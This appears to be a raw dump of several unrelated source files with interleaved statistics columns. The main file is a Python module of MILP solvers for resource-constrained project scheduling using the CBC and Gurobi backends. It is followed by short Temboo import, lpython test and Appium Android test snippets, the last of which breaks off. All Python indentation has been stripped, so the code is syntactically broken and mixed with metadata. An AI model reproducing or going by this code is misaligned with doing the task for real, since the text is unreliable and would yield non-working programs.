# p = [0, 3, 2, 5, 4, 2, 3, 4, 2, 4, 6, 0]
sorted_tasks = sorted(self.rcpsp_model.mode_details.keys())
print(sorted_tasks)
p = [int(self.rcpsp_model.mode_details[key][1]['duration'])
for key in sorted_tasks]
# print('p:', p)
# u = [[0, 0], [5, 1], [0, 4], [1, 4], [1, 3], [3, 2], [3, 1], [2, 4],
# [4, 0], [5, 2], [2, 5], [0, 0]]
u = []
for task in sorted_tasks:
tmp = []
for r in self.rcpsp_model.resources.keys():
tmp.append(self.rcpsp_model.mode_details[task][1][r])
u.append(tmp)
# print('u: ', u)
# c = [6, 8]
c = [x for x in self.rcpsp_model.resources.values()]
# print('c: ', c)
# S = [[0, 1], [0, 2], [0, 3], [1, 4], [1, 5], [2, 9], [2, 10], [3, 8], [4, 6],
# [4, 7], [5, 9], [5, 10], [6, 8], [6, 9], [7, 8], [8, 11], [9, 11], [10, 11]]
S = []
print('successors: ', self.rcpsp_model.successors)
for task in sorted_tasks:
for suc in self.rcpsp_model.successors[task]:
S.append([task-1, suc-1])
# print('S: ', S)
(R, self.J, self.T) = (range(len(c)), range(len(p)), range(sum(p)))
# we have a better self.T to limit the number of variables :
self.T = range(int(makespan+1))
# model = Model()
self.model = Model(sense=MINIMIZE,
solver_name=self.lp_solver)
self.x: List[List[Var]] = [[self.model.add_var(name="x({},{})".format(j, t),
var_type=BINARY) for t in self.T]
for j in self.J]
self.model.objective = xsum(self.x[len(self.J) - 1][t] * t for t in self.T)
for j in self.J:
self.model += xsum(self.x[j][t] for t in self.T) == 1
for (r, t) in product(R, self.T):
self.model += (
xsum(u[j][r] * self.x[j][t2] for j in self.J for t2 in range(max(0, t - p[j] + 1), t + 1))
<= c[r])
for (j, s) in S:
self.model += xsum(t * self.x[s][t] - t * self.x[j][t] for t in self.T) >= p[j]
start = []
for j in self.J:
for t in self.T:
if self.start_solution.rcpsp_schedule[j+1]["start_time"] == t:
start += [(self.x[j][t], 1)]
else:
start += [(self.x[j][t], 0)]
self.model.start = start
p_s: Union[PartialSolution, None] = args.get("partial_solution", None)
self.constraints_partial_solutions = []
if p_s is not None:
constraints = []
if p_s.start_times is not None:
for task in p_s.start_times:
constraints += [self.model.add_constr(xsum([j*self.x[task-1][j]
for j in range(len(self.x[task-1]))]) == p_s.start_times[task])]
constraints += [self.model.add_constr(self.x[task-1][p_s.start_times[task]] == 1)]
if p_s.partial_permutation is not None:
for t1, t2 in zip(p_s.partial_permutation[:-1], p_s.partial_permutation[1:]):
constraints += [self.model.add_constr(xsum([t * self.x[t1-1][t]-t*self.x[t2-1][t]
for t in self.T]) <= 0)]
if p_s.list_partial_order is not None:
for l in p_s.list_partial_order:
for t1, t2 in zip(l[:-1], l[1:]):
constraints += [self.model.add_constr(xsum([t * self.x[t1-1][t]-t*self.x[t2-1][t]
for t in self.T]) <= 0)]
self.starts = {}
for j in range(len(self.x)):
self.starts[j] = self.model.add_var(name="start_" + str(j),
lb=0, ub=makespan)
self.model.add_constr(xsum(t * self.x[j][t] for t in self.T) == self.starts[j])
if p_s.start_at_end is not None:
for i, j in p_s.start_at_end:
constraints += [self.model.add_constr(self.starts[j-1] == self.starts[i-1]+p[i-1])]
if p_s.start_together is not None:
for i, j in p_s.start_together:
constraints += [self.model.add_constr(self.starts[j-1] == self.starts[i-1])]
if p_s.start_after_nunit is not None:
for t1, t2, delta in p_s.start_after_nunit:
constraints += [self.model.add_constr(self.starts[t2-1] >= self.starts[t1-1]+delta)]
if p_s.start_at_end_plus_offset is not None:
for t1, t2, delta in p_s.start_at_end_plus_offset:
constraints += [self.model.add_constr(self.starts[t2-1] >= self.starts[t1-1]+delta+p[t1-1])]
self.constraints_partial_solutions = constraints
def retrieve_solutions(self, parameters_milp: ParametersMilp) -> ResultStorage:
retrieve_all_solution = parameters_milp.retrieve_all_solution
nb_solutions_max = parameters_milp.n_solutions_max
nb_solution = min(nb_solutions_max, self.model.num_solutions)
if not retrieve_all_solution:
nb_solution = 1
list_solution_fits = []
print(nb_solution, " solutions found")
for s in range(nb_solution):
rcpsp_schedule = {}
objective = self.model.objective_values[s]
for (j, t) in product(self.J, self.T):
value = self.x[j][t].xi(s)
if value >= 0.5:
rcpsp_schedule[j + 1] = {'start_time': t,
'end_time': t + self.rcpsp_model.mode_details[j + 1][1]['duration']}
print("Size schedule : ", len(rcpsp_schedule.keys()))
try:
solution = RCPSPSolution(problem=self.rcpsp_model,
rcpsp_schedule=rcpsp_schedule,
rcpsp_schedule_feasible=True)
fit = self.aggreg_from_sol(solution)
list_solution_fits += [(solution, fit)]
except:
print("Problem =", rcpsp_schedule, len(rcpsp_schedule))
pass
return ResultStorage(list_solution_fits=list_solution_fits,
best_solution=min(list_solution_fits,
key=lambda x: x[1])[0],
mode_optim=self.params_objective_function.sense_function)
def solve(self, parameters_milp: ParametersMilp=ParametersMilp.default(), **kwargs)->ResultStorage:
if self.model is None:
self.init_model()
limit_time_s = parameters_milp.TimeLimit
self.model.sol_pool_size = parameters_milp.PoolSolutions
self.model.max_mip_gap_abs = parameters_milp.MIPGapAbs
self.model.max_mip_gap = parameters_milp.MIPGap
self.model.optimize(max_seconds=limit_time_s,
max_solutions=parameters_milp.n_solutions_max)
return self.retrieve_solutions(parameters_milp)
class LP_MRCPSP(MilpSolver):
def __init__(self,
rcpsp_model: MultiModeRCPSPModel,
lp_solver=LP_RCPSP_Solver.CBC,
params_objective_function: ParamsObjectiveFunction=None, **kwargs):
self.rcpsp_model = rcpsp_model
self.model: Model = None
self.lp_solver = CBC
if lp_solver == LP_RCPSP_Solver.GRB:
self.lp_solver = GRB
elif lp_solver == LP_RCPSP_Solver.CBC:
self.lp_solver = CBC
self.variable_decision = {}
self.constraints_dict = {}
self.constraints_dict["lns"] = []
self.aggreg_from_sol, self.aggreg_dict, self.params_objective_function = \
build_aggreg_function_and_params_objective(problem=self.rcpsp_model,
params_objective_function=
params_objective_function)
# self.description_variable_description = {}
# self.description_constraint = {}
def init_model(self, **args):
greedy_start = args.get("greedy_start", True)
start_solution = args.get("start_solution", None)
verbose = args.get("verbose", False)
if start_solution is None:
if greedy_start:
if verbose:
print("Computing greedy solution")
greedy_solver = PileSolverRCPSP(self.rcpsp_model)
store_solution = greedy_solver.solve(greedy_choice=GreedyChoice.MOST_SUCCESSORS)
self.start_solution = store_solution.get_best_solution_fit()[0]
makespan = self.rcpsp_model.evaluate(self.start_solution)["makespan"]
else:
if verbose:
print("Get dummy solution")
solution = self.rcpsp_model.get_dummy_solution()
self.start_solution = solution
makespan = self.rcpsp_model.evaluate(solution)["makespan"]
else:
self.start_solution = start_solution
makespan = self.rcpsp_model.evaluate(start_solution)["makespan"]
# p = [0, 3, 2, 5, 4, 2, 3, 4, 2, 4, 6, 0]
sorted_tasks = sorted(self.rcpsp_model.mode_details.keys())
p = [int(max([self.rcpsp_model.mode_details[key][mode]['duration']
for mode in self.rcpsp_model.mode_details[key]]))
for key in sorted_tasks]
# c = [6, 8]
c = [x for x in self.rcpsp_model.resources.values()]
renewable = {r: self.rcpsp_model.resources[r] for r in self.rcpsp_model.resources
if r not in self.rcpsp_model.non_renewable_resources}
non_renewable = {r: self.rcpsp_model.resources[r] for r in self.rcpsp_model.non_renewable_resources}
# print('c: ', c)
# S = [[0, 1], [0, 2], [0, 3], [1, 4], [1, 5], [2, 9], [2, 10], [3, 8], [4, 6],
# [4, 7], [5, 9], [5, 10], [6, 8], [6, 9], [7, 8], [8, 11], [9, 11], [10, 11]]
S = []
print('successors: ', self.rcpsp_model.successors)
for task in sorted_tasks:
for suc in self.rcpsp_model.successors[task]:
S.append([task, suc])
# print('S: ', S)
(R, self.J, self.T) = (range(len(c)), range(len(p)), range(sum(p)))
# we have a better self.T to limit the number of variables :
if self.start_solution.rcpsp_schedule_feasible:
self.T = range(int(makespan+1))
# model = Model()
self.model = Model(sense=MINIMIZE,
solver_name=self.lp_solver)
self.x: Dict[Var] = {}
last_task = max(self.rcpsp_model.mode_details.keys())
variable_per_task = {}
for task in sorted_tasks:
if task not in variable_per_task:
variable_per_task[task] = []
for mode in self.rcpsp_model.mode_details[task]:
for t in self.T:
self.x[(task, mode, t)] = self.model.add_var(name="x({},{}, {})".format(task, mode, t),
var_type=BINARY)
variable_per_task[task] += [(task, mode, t)]
self.model.objective = xsum(self.x[key] * key[2] for key in variable_per_task[last_task])
for j in variable_per_task:
self.model += xsum(self.x[key] for key in variable_per_task[j]) == 1
if isinstance(self.rcpsp_model, RCPSPModelCalendar):
renewable_quantity = {r: renewable[r] for r in renewable}
else:
renewable_quantity = {r: [renewable[r]]*len(self.T) for r in renewable}
if isinstance(self.rcpsp_model, RCPSPModelCalendar):
non_renewable_quantity = {r: non_renewable[r] for r in non_renewable}
else:
non_renewable_quantity = {r: [non_renewable[r]]*len(self.T) for r in non_renewable}
for (r, t) in product(renewable, self.T):
self.model.add_constr(xsum(int(self.rcpsp_model.mode_details[key[0]][key[1]][r]) * self.x[key]
for key in self.x
if key[2] <= t < key[2]+int(self.rcpsp_model.mode_details[key[0]][key[1]]["duration"]))
<= renewable_quantity[r][t])
print(r, t)
for r in non_renewable:
self.model.add_constr(xsum(int(self.rcpsp_model.mode_details[key[0]][key[1]][r]) * self.x[key]
for key in self.x) <= non_renewable_quantity[r][0])
durations = {j: self.model.add_var(name="duration_"+str(j),
var_type=INTEGER)
for j in variable_per_task}
self.durations = durations
self.variable_per_task = variable_per_task
for j in variable_per_task:
self.model.add_constr(xsum(self.rcpsp_model.mode_details[key[0]][key[1]]["duration"]*self.x[key]
for key in variable_per_task[j]) == durations[j])
for (j, s) in S:
self.model.add_constr(xsum([key[2] * self.x[key] for key in variable_per_task[s]]
+ [- key[2] * self.x[key]
for key in variable_per_task[j]]) >=
durations[j])
start = []
for j in self.start_solution.rcpsp_schedule:
start_time_j = self.start_solution.rcpsp_schedule[j]["start_time"]
mode_j = 1 if j == 1 or j == self.rcpsp_model.n_jobs + 2 else self.start_solution.rcpsp_modes[j - 2]
start += [(self.durations[j], self.rcpsp_model.mode_details[j][mode_j]["duration"])]
for k in self.variable_per_task[j]:
task, mode, time = k
if start_time_j == time and mode == mode_j:
start += [(self.x[k], 1)]
else:
start += [(self.x[k], 0)]
self.model.start = start
p_s: Union[PartialSolution, None] = args.get("partial_solution", None)
self.constraints_partial_solutions = []
if p_s is not None:
constraints = []
if p_s.start_times is not None:
for task in p_s.start_times:
constraints += [self.model.add_constr(xsum([self.x[k] for k in self.variable_per_task[task]
if k[2] == p_s.start_times[task]]) == 1)]
if p_s.partial_permutation is not None:
for t1, t2 in zip(p_s.partial_permutation[:-1], p_s.partial_permutation[1:]):
constraints += [self.model.add_constr(xsum([key[2] * self.x[key] for key in variable_per_task[t1]]
+ [- key[2] * self.x[key]
for key in variable_per_task[t2]]) <= 0)]
if p_s.list_partial_order is not None:
for l in p_s.list_partial_order:
for t1, t2 in zip(l[:-1], l[1:]):
constraints += [self.model.add_constr(xsum([key[2] * self.x[key] for key in variable_per_task[t1]]
+ [- key[2] * self.x[key]
for key in variable_per_task[t2]]) <= 0)]
self.constraints_partial_solutions = constraints
print('Partial solution constraints : ', self.constraints_partial_solutions)
def retrieve_solutions(self, parameters_milp: ParametersMilp) -> ResultStorage:
retrieve_all_solution = parameters_milp.retrieve_all_solution
nb_solutions_max = parameters_milp.n_solutions_max
nb_solution = min(nb_solutions_max, self.model.num_solutions)
if not retrieve_all_solution:
nb_solution = 1
list_solution_fits = []
print(nb_solution, " solutions found")
for s in range(nb_solution):
rcpsp_schedule = {}
modes = {}
objective = self.model.objective_values[s]
for (task, mode, t) in self.x:
value = self.x[(task, mode, t)].xi(s)
if value >= 0.5:
rcpsp_schedule[task] = {'start_time': t,
'end_time': t + self.rcpsp_model.mode_details[task][mode]['duration']}
modes[task] = mode
print("Size schedule : ", len(rcpsp_schedule.keys()))
try:
modes.pop(1)
modes.pop(self.rcpsp_model.n_jobs+2)
modes_vec = [modes[k] for k in sorted(modes)]
solution = RCPSPSolution(problem=self.rcpsp_model,
rcpsp_schedule=rcpsp_schedule,
rcpsp_modes=modes_vec,
rcpsp_schedule_feasible=True)
fit = self.aggreg_from_sol(solution)
list_solution_fits += [(solution, fit)]
except:
pass
return ResultStorage(list_solution_fits=list_solution_fits,
best_solution=min(list_solution_fits,
key=lambda x: x[1])[0],
mode_optim=self.params_objective_function.sense_function)
def solve(self, parameters_milp: ParametersMilp=ParametersMilp.default(), **kwargs)->ResultStorage:
if self.model is None:
self.init_model(greedy_start=False, **kwargs)
limit_time_s = parameters_milp.TimeLimit
self.model.sol_pool_size = parameters_milp.PoolSolutions
self.model.max_mip_gap_abs = parameters_milp.MIPGapAbs
self.model.max_mip_gap = parameters_milp.MIPGap
self.model.optimize(max_seconds=limit_time_s,
max_solutions=parameters_milp.n_solutions_max)
return self.retrieve_solutions(parameters_milp)
class LP_MRCPSP_GUROBI(MilpSolver):
def __init__(self,
rcpsp_model: MultiModeRCPSPModel,
lp_solver=LP_RCPSP_Solver.CBC,
params_objective_function: ParamsObjectiveFunction=None, **kwargs):
self.rcpsp_model = rcpsp_model
self.model: gurobi.Model = None
self.lp_solver = CBC
if lp_solver == LP_RCPSP_Solver.GRB:
self.lp_solver = GRB
elif lp_solver == LP_RCPSP_Solver.CBC:
self.lp_solver = CBC
self.variable_decision = {}
self.constraints_dict = {}
self.constraints_dict["lns"] = []
self.aggreg_from_sol, self.aggreg_dict, self.params_objective_function = \
build_aggreg_function_and_params_objective(problem=self.rcpsp_model,
params_objective_function=
params_objective_function)
# self.description_variable_description = {}
# self.description_constraint = {}
def init_model(self, **args):
greedy_start = args.get("greedy_start", True)
start_solution = args.get("start_solution", None)
max_horizon = args.get("max_horizon", None)
verbose = args.get("verbose", False)
if start_solution is None:
if greedy_start:
if verbose:
print("Computing greedy solution")
if isinstance(self.rcpsp_model, RCPSPModelCalendar):
greedy_solver = PileSolverRCPSP_Calendar(self.rcpsp_model)
else:
greedy_solver = PileSolverRCPSP(self.rcpsp_model)
store_solution = greedy_solver.solve(greedy_choice=GreedyChoice.MOST_SUCCESSORS)
self.start_solution = store_solution.get_best_solution_fit()[0]
makespan = self.rcpsp_model.evaluate(self.start_solution)["makespan"]
else:
if verbose:
print("Get dummy solution")
solution = self.rcpsp_model.get_dummy_solution()
self.start_solution = solution
makespan = self.rcpsp_model.evaluate(solution)["makespan"]
else:
self.start_solution = start_solution
makespan = self.rcpsp_model.evaluate(start_solution)["makespan"]
# p = [0, 3, 2, 5, 4, 2, 3, 4, 2, 4, 6, 0]
sorted_tasks = sorted(self.rcpsp_model.mode_details.keys())
p = [int(max([self.rcpsp_model.mode_details[key][mode]['duration']
for mode in self.rcpsp_model.mode_details[key]]))
for key in sorted_tasks]
# c = [6, 8]
c = [x for x in self.rcpsp_model.resources.values()]
renewable = {r: self.rcpsp_model.resources[r] for r in self.rcpsp_model.resources
if r not in self.rcpsp_model.non_renewable_resources}
non_renewable = {r: self.rcpsp_model.resources[r] for r in self.rcpsp_model.non_renewable_resources}
# print('c: ', c)
# S = [[0, 1], [0, 2], [0, 3], [1, 4], [1, 5], [2, 9], [2, 10], [3, 8], [4, 6],
# [4, 7], [5, 9], [5, 10], [6, 8], [6, 9], [7, 8], [8, 11], [9, 11], [10, 11]]
S = []
print('successors: ', self.rcpsp_model.successors)
for task in sorted_tasks:
for suc in self.rcpsp_model.successors[task]:
S.append([task, suc])
# print('S: ', S)
(R, self.J, self.T) = (range(len(c)), range(len(p)), list(range(sum(p))))
# we have a better self.T to limit the number of variables :
if self.start_solution.rcpsp_schedule_feasible:
self.T = list(range(int(makespan+1)))
if max_horizon is not None:
self.T = list(range(max_horizon+1))
print("Hey")
print(self.T)
# model = Model()
self.model = gurobi.Model("MRCPSP")
self.x: Dict[gurobi.Var] = {}
last_task = max(self.rcpsp_model.mode_details.keys())
variable_per_task = {}
keys_for_t = {}
for task in sorted_tasks:
if task not in variable_per_task:
variable_per_task[task] = []
for mode in self.rcpsp_model.mode_details[task]:
for t in self.T:
self.x[(task, mode, t)] = self.model.addVar(name="x({},{}, {})".format(task, mode, t),
vtype=gurobi.GRB.BINARY)
for tt in range(t, t+self.rcpsp_model.mode_details[task][mode]["duration"]):
if tt not in keys_for_t:
keys_for_t[tt] = set()
keys_for_t[tt].add((task, mode, t))
variable_per_task[task] += [(task, mode, t)]
self.model.update()
self.model.setObjective(gurobi.quicksum(self.x[key] * key[2] for key in variable_per_task[last_task]))
self.model.addConstrs(gurobi.quicksum(self.x[key] for key in variable_per_task[j]) == 1
for j in variable_per_task)
if isinstance(self.rcpsp_model, RCPSPModelCalendar):
renewable_quantity = {r: renewable[r] for r in renewable}
else:
renewable_quantity = {r: [renewable[r]]*len(self.T) for r in renewable}
if isinstance(self.rcpsp_model, RCPSPModelCalendar):
non_renewable_quantity = {r: non_renewable[r] for r in non_renewable}
else:
non_renewable_quantity = {r: [non_renewable[r]]*len(self.T) for r in non_renewable}
#for r, t in product(renewable, self.T):
# self.model.addConstr(gurobi.quicksum(int(self.rcpsp_model.mode_details[key[0]][key[1]][r]) * self.x[key]
# for key in keys_for_t[t])
# <= renewable_quantity[r][t])
# print(r, t)
self.model.addConstrs(gurobi.quicksum(int(self.rcpsp_model.mode_details[key[0]][key[1]][r]) * self.x[key]
for key in keys_for_t[t])
<= renewable_quantity[r][t]
for (r,t) in product(renewable, self.T))
self.model.addConstrs(gurobi.quicksum(int(self.rcpsp_model.mode_details[key[0]][key[1]][r]) * self.x[key]
for key in self.x) <= non_renewable_quantity[r][0]
for r in non_renewable)
self.model.update()
durations = {j: self.model.addVar(name="duration_"+str(j),
vtype=gurobi.GRB.INTEGER)
for j in variable_per_task}
self.durations = durations
self.variable_per_task = variable_per_task
self.model.addConstrs(gurobi.quicksum(self.rcpsp_model.mode_details[key[0]][key[1]]["duration"]*self.x[key]
for key in variable_per_task[j]) == durations[j]
for j in variable_per_task)
self.model.addConstrs(gurobi.quicksum([key[2] * self.x[key] for key in variable_per_task[s]]
+ [- key[2] * self.x[key]
for key in variable_per_task[j]]) >=
durations[j]
for (j, s) in S)
start = []
self.starts = {}
for task in sorted_tasks:
self.starts[task] = self.model.addVar(name="start({})".format(task),
vtype=gurobi.GRB.INTEGER,
lb=0, ub=self.T[-1])
self.starts[task].start = self.start_solution.rcpsp_schedule[task]["start_time"]
self.model.addConstr(gurobi.quicksum([self.x[key]*key[2] for key in variable_per_task[task]])
== self.starts[task])
for j in self.start_solution.rcpsp_schedule:
start_time_j = self.start_solution.rcpsp_schedule[j]["start_time"]
mode_j = 1 if j == 1 or j == self.rcpsp_model.n_jobs + 2 else self.start_solution.rcpsp_modes[j - 2]
start += [(self.durations[j], self.rcpsp_model.mode_details[j][mode_j]["duration"])]
for k in self.variable_per_task[j]:
task, mode, time = k
if start_time_j == time and mode == mode_j:
start += [(self.x[k], 1)]
self.x[k].start = 1
else:
start += [(self.x[k], 0)]
self.x[k].start = 0
# self.model.start = start
p_s: Union[PartialSolution, None] = args.get("partial_solution", None)
self.constraints_partial_solutions = []
self.model.update()
if p_s is not None:
constraints = []
if p_s.start_times is not None:
constraints = self.model.addConstrs(gurobi.quicksum([self.x[k] for k in self.variable_per_task[task]
if k[2] == p_s.start_times[task]]) == 1
for task in p_s.start_times)
if p_s.partial_permutation is not None:
for t1, t2 in zip(p_s.partial_permutation[:-1], p_s.partial_permutation[1:]):
constraints += [self.model.addConstr(gurobi.quicksum([key[2] * self.x[key] for key in variable_per_task[t1]]
+ [- key[2] * self.x[key]
for key in variable_per_task[t2]]) <= 0)]
if p_s.list_partial_order is not None:
for l in p_s.list_partial_order:
for t1, t2 in zip(l[:-1], l[1:]):
constraints += [self.model.addConstr(gurobi.quicksum([key[2] * self.x[key] for key in variable_per_task[t1]]
+ [- key[2] * self.x[key]
for key in variable_per_task[t2]]) <= 0)]
if p_s.start_at_end is not None:
for i, j in p_s.start_at_end:
constraints += [self.model.addConstr(self.starts[j] == self.starts[i]+durations[i])]
if p_s.start_together is not None:
for i, j in p_s.start_together:
constraints += [self.model.addConstr(self.starts[j] == self.starts[i])]
if p_s.start_after_nunit is not None:
for t1, t2, delta in p_s.start_after_nunit:
constraints += [self.model.addConstr(self.starts[t2] >= self.starts[t1]+delta)]
if p_s.start_at_end_plus_offset is not None:
for t1, t2, delta in p_s.start_at_end_plus_offset:
constraints += [self.model.addConstr(self.starts[t2] >= self.starts[t1]+delta+durations[t1])]
self.constraints_partial_solutions = constraints
print('Partial solution constraints : ', self.constraints_partial_solutions)
self.model.update()
def retrieve_solutions(self, parameters_milp: ParametersMilp) -> ResultStorage:
retrieve_all_solution = parameters_milp.retrieve_all_solution
nb_solutions_max = parameters_milp.n_solutions_max
nb_solution = min(nb_solutions_max, self.model.SolCount)
if not retrieve_all_solution:
nb_solution = 1
list_solution_fits = []
for s in range(nb_solution):
self.model.params.SolutionNumber = s
rcpsp_schedule = {}
modes = {}
objective = self.model.getAttr("ObjVal")
for (task, mode, t) in self.x:
value = self.x[(task, mode, t)].getAttr('Xn')
if value >= 0.5:
rcpsp_schedule[task] = {'start_time': t,
'end_time': t + self.rcpsp_model.mode_details[task][mode]['duration']}
modes[task] = mode
print("Size schedule : ", len(rcpsp_schedule.keys()))
try:
modes.pop(1)
modes.pop(self.rcpsp_model.n_jobs+2)
modes_vec = [modes[k] for k in sorted(modes)]
solution = RCPSPSolution(problem=self.rcpsp_model,
rcpsp_schedule=rcpsp_schedule,
rcpsp_modes=modes_vec,
rcpsp_schedule_feasible=True)
fit = self.aggreg_from_sol(solution)
list_solution_fits += [(solution, fit)]
except:
pass
return ResultStorage(list_solution_fits=list_solution_fits,
best_solution=min(list_solution_fits,
key=lambda x: x[1])[0],
mode_optim=self.params_objective_function.sense_function)
def solve(self, parameters_milp: ParametersMilp=ParametersMilp.default(), **kwargs)->ResultStorage:
if self.model is None:
self.init_model(greedy_start=False, **kwargs)
self.model.setParam("TimeLimit", parameters_milp.TimeLimit)
self.model.setParam("MIPGapAbs", parameters_milp.MIPGapAbs)
self.model.setParam("PoolSolutions", parameters_milp.PoolSolutions)
self.model.modelSense = gurobi.GRB.MINIMIZE
self.model.optimize()
return self.retrieve_solutions(parameters_milp)
| 53.860856
| 139
| 0.548077
| 4,291
| 35,225
| 4.287579
| 0.055232
| 0.047831
| 0.06392
| 0.026416
| 0.906185
| 0.886509
| 0.855908
| 0.823242
| 0.814165
| 0.800087
| 0
| 0.016069
| 0.341008
| 35,225
| 653
| 140
| 53.943338
| 0.776505
| 0.046246
| 0
| 0.758377
| 0
| 0
| 0.025573
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021164
| false
| 0.005291
| 0.022928
| 0
| 0.065256
| 0.037037
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1b3502587afa799940a20dfb06d571e67f4f6f7e
| 551
|
py
|
Python
|
temboo/core/Library/PostgreSQL/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 7
|
2016-03-07T02:07:21.000Z
|
2022-01-21T02:22:41.000Z
|
temboo/core/Library/PostgreSQL/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | null | null | null |
temboo/core/Library/PostgreSQL/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 8
|
2016-06-14T06:01:11.000Z
|
2020-04-22T09:21:44.000Z
|
from temboo.Library.PostgreSQL.JSONToDB import JSONToDB, JSONToDBInputSet, JSONToDBResultSet, JSONToDBChoreographyExecution
from temboo.Library.PostgreSQL.ParameterizedQuery import ParameterizedQuery, ParameterizedQueryInputSet, ParameterizedQueryResultSet, ParameterizedQueryChoreographyExecution
from temboo.Library.PostgreSQL.RunCommand import RunCommand, RunCommandInputSet, RunCommandResultSet, RunCommandChoreographyExecution
from temboo.Library.PostgreSQL.XMLToDB import XMLToDB, XMLToDBInputSet, XMLToDBResultSet, XMLToDBChoreographyExecution
| 110.2
| 173
| 0.905626
| 40
| 551
| 12.475
| 0.525
| 0.08016
| 0.136273
| 0.216433
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.050817
| 551
| 4
| 174
| 137.75
| 0.954111
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1baafbd2bab8eec64d1e42e8e421919cb2c222f1
| 43
|
py
|
Python
|
tests/errors/test_zero_division4.py
|
akshanshbhatt/lpython
|
70fef49dbbb6cbb0447f7013231171e5c8b8e5df
|
[
"BSD-3-Clause"
] | 31
|
2022-01-07T23:56:33.000Z
|
2022-03-29T16:09:02.000Z
|
tests/errors/test_zero_division4.py
|
akshanshbhatt/lpython
|
70fef49dbbb6cbb0447f7013231171e5c8b8e5df
|
[
"BSD-3-Clause"
] | 197
|
2021-12-29T19:01:41.000Z
|
2022-03-31T15:58:25.000Z
|
tests/errors/test_zero_division4.py
|
akshanshbhatt/lpython
|
70fef49dbbb6cbb0447f7013231171e5c8b8e5df
|
[
"BSD-3-Clause"
] | 17
|
2022-01-06T15:34:36.000Z
|
2022-03-31T13:55:33.000Z
|
def f():
f: f64 = 4.5
print(f/0.0)
| 10.75
| 16
| 0.418605
| 10
| 43
| 1.8
| 0.7
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.214286
| 0.348837
| 43
| 3
| 17
| 14.333333
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0
| 0
| 0.333333
| 0.333333
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1bd16e4bf1b877db71262f3ac1db829ea5b26135
| 45
|
py
|
Python
|
modules/rulesets/reportingsystems/__init__.py
|
fingerecho/proms-4.0
|
6c3a1fd62c9394761664e100fc1dde50fd79dc11
|
[
"CC-BY-4.0"
] | 2
|
2019-11-23T03:56:28.000Z
|
2019-12-03T15:48:34.000Z
|
modules/rulesets/reportingsystems/__init__.py
|
fingerecho/proms-4.0
|
6c3a1fd62c9394761664e100fc1dde50fd79dc11
|
[
"CC-BY-4.0"
] | null | null | null |
modules/rulesets/reportingsystems/__init__.py
|
fingerecho/proms-4.0
|
6c3a1fd62c9394761664e100fc1dde50fd79dc11
|
[
"CC-BY-4.0"
] | 3
|
2019-04-12T18:09:35.000Z
|
2020-03-14T14:38:45.000Z
|
from .reportingsystems import ReportingSytems
| 45
| 45
| 0.911111
| 4
| 45
| 10.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066667
| 45
| 1
| 45
| 45
| 0.97619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
942696cafcbec5e78a18c3f13f710fecff455690
| 14,496
|
py
|
Python
|
tests/PDAtest.py
|
canfeit/wappium
|
d5d288a114180934f2a0f9f057916399a9a8555a
|
[
"MIT"
] | 1
|
2019-09-10T07:30:56.000Z
|
2019-09-10T07:30:56.000Z
|
tests/PDAtest.py
|
canfeit/wappium
|
d5d288a114180934f2a0f9f057916399a9a8555a
|
[
"MIT"
] | 1
|
2021-05-10T13:36:33.000Z
|
2021-05-10T13:36:33.000Z
|
tests/PDAtest.py
|
canfeit/wappium
|
d5d288a114180934f2a0f9f057916399a9a8555a
|
[
"MIT"
] | 1
|
2020-02-16T08:27:41.000Z
|
2020-02-16T08:27:41.000Z
|
#-*- coding: UTF-8 -*-
import os,sys
import unittest
from testwa import webdriver
from testwa.webdriver.common.touch_action import TouchAction
from testwa.webdriver.common.multi_action import MultiAction
from time import sleep
import unicodedata
import random
import subprocess
# Returns abs path relative to this file and not cwd
PATH = lambda p: os.path.abspath(
os.path.join(os.path.dirname(__file__), p)
)
p = None
class TestwaTests(unittest.TestCase):
def setUp(self):
global wd,screenRatioX,screenRatioY,touchAction,p
if p:
p.terminate()
p.wait()
p = subprocess.Popen(["C:\\Testwa\\Generator\\TestwaServer\\node.exe", "C:\\Testwa\\Generator\\TestwaServer\\build\\lib\\main.js"])
sleep(10)
desired_caps = {}
desired_caps['platformName'] = 'Android'
desired_caps['platformVersion'] = '5.1'
desired_caps['deviceName'] = 'MT66-2WA-8D00375'
